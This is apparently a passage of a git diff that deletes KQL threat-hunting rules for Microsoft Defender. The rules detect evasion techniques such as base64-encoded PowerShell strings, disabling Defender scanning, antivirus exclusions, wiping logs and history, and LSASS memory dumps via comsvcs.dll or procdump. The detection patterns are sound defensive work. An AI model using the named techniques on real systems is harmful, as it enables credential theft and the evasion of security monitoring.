"bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA"
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql b/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql
deleted file mode 100644
index 78c3b4de..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/30
-// Level: high
-// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud"))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql b/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql
deleted file mode 100644
index 9b323c33..00000000
--- a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql b/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 999c9ee8..00000000
--- a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects PowerShell core DLL being loaded by an Office Product
-// Tags: attack.defense_evasion
-DeviceImageLoadEvents
-| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql b/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql
deleted file mode 100644
index dd39645e..00000000
--- a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/02
-// Level: high
-// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Microsoft\\Windows\\PowerShell" or RegistryKey contains "\\Microsoft\\PowerShellCore") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql b/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql
deleted file mode 100644
index 5e298951..00000000
--- a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects PowerShell execution to set the ACL of a file or a folder
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql b/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql
deleted file mode 100644
index b53f42c8..00000000
--- a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql b/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql
deleted file mode 100644
index fc55890a..00000000
--- a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/04
-// Level: high
-// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql b/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql
deleted file mode 100644
index f715383e..00000000
--- a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/03
-// Level: high
-// Description: Detects requests to disable Microsoft Defender features using PowerShell commands
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI"))
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Defender_Exclusion.kql b/Defense Evasion/Powershell_Defender_Exclusion.kql
deleted file mode 100644
index 72f711b3..00000000
--- a/Defense Evasion/Powershell_Defender_Exclusion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/04/29
-// Level: medium
-// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql b/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql
deleted file mode 100644
index 2e4c9b07..00000000
--- a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/27
-// Level: high
-// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
-// Tags: attack.defense_evasion, attack.t1027.009
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}"
\ No newline at end of file
diff --git a/Defense Evasion/Powerup_Write_Hijack_DLL.kql b/Defense Evasion/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Defense Evasion/Powerup_Write_Hijack_DLL.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Defense Evasion/Prefetch_File_Deleted.kql b/Defense Evasion/Prefetch_File_Deleted.kql
deleted file mode 100644
index c59b8323..00000000
--- a/Defense Evasion/Prefetch_File_Deleted.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON
-// Date: 2021/09/29
-// Level: high
-// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql b/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql
deleted file mode 100644
index 833c963a..00000000
--- a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
-// Tags: attack.command_and_control, attack.t1105, attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Procdump_Execution.kql b/Defense Evasion/Procdump_Execution.kql
deleted file mode 100644
index e0baffc1..00000000
--- a/Defense Evasion/Procdump_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/16
-// Level: medium
-// Description: Detects usage of the SysInternals Procdump utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql b/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql b/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql b/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql
deleted file mode 100644
index fddf31d9..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql
deleted file mode 100644
index 864ecfca..00000000
--- a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
